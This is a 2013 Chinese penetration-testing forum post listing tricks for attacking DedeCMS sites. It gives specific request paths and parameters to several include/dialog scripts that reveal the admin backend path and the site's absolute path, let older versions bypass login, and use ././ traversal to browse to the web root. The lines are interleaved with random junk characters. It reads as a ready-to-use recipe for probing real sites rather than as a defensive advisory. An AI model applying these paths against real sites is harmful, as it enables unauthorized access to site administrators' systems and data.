找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms爆后台文件技巧
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2118|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
8 D2 U- u6 [$ o" }1 u2 |* g+ f4 ~2 L, p4 |! z) K, l
员帐号,新版本的就直接转向了后台.
5 A1 b7 A- |$ i8 }" t& |# E8 E9 J3 ?  R" O) C
2.include/dialog/config.php会爆出后台管理路径  f0 Q1 a3 ]0 ?' n$ O6 ~

6 |) X" F4 S$ l3 M* m& o* r* Y3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录0 g( ^" U. r- B$ K, P
; |  z5 M9 @" f! d$ z! o
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
! ~6 L# ~/ B4 Q+ V& Q( m5 U0 J+ u3 O! M! M8 a; u
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉) b7 O, s9 @% i/ V- b

: F5 }! R$ x9 m3 D4 `到根目录去.不过这些版本的访问地址有些不同.
, P3 F% Z/ K+ H5 ]5 h9 \地址为require/dialog/select_soft.php?activepath=/././././././././- ]% p$ @; K) l6 I3 B

7 u4 P$ ~+ Y+ v' [6 winclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..  {5 k9 F# @4 e9 ?
存在相同问题的文件还有
) X! v3 t! I" p& Z6 J1 z* H% Pinclude\dialog\select_images.php
$ f+ d6 y7 y3 g5 f' x! Yinclude\dialog\select_media.php
" t" R$ @- k: L0 I8 hinclude\dialog\select_templets.php​
+ g! s8 w7 [# g2 }
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表